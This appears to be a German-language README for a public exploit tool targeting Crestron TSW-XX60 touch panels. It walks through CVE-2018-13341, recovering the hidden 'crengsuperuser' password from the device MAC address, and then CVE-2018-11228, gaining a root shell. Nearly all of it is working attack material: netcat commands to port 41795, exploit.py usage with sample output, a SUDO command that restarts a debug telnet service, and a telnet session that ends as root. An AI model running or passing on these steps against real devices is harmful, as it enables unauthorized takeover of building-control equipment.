
Dieses Tool zielt darauf ab, die CVE-2018-13341 auszunutzen.
Dieses Tool zielt darauf ab, die CVE-2018-13341 auszunutzen. Durch Verwendung der MAC-Adresse des Zielgeräts können Sie das Passwort des versteckten Kontos "crengsuperuser" wiederherstellen, das erhöhte Privilegien besitzt und die Ausführung von SUDO-Befehlen ermöglicht.
Das Crestron Toolbox Protocol (CTP) kann durch Zugriff auf Port 41795 auf dem TSW-XX60-Gerät verbunden werden.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
Dieses Tool erfordert das CryptoGraphy-Modul.
# pip3 install cryptography
ODER
# pip3 install -r requirements.txt
usage: exploit.py [-h] [-m MAC]
# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass
Die CVE-2018-11228 ermöglicht unauthorisierte RCE über den Bash-Shell-Dienst im Crestron Terminal Protocol (CTP). Nachdem Sie das Passwort des versteckten Kontos "crengsuperuser" erhalten haben, können Sie Root-Zugriff auf das Gerät erhalten.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
Dann können Sie in einer neuen Shell Root-Zugriff auf die Box erhalten.
# telnet w.x.y.z
bash# whoami
root
Credit Goes to : axcheron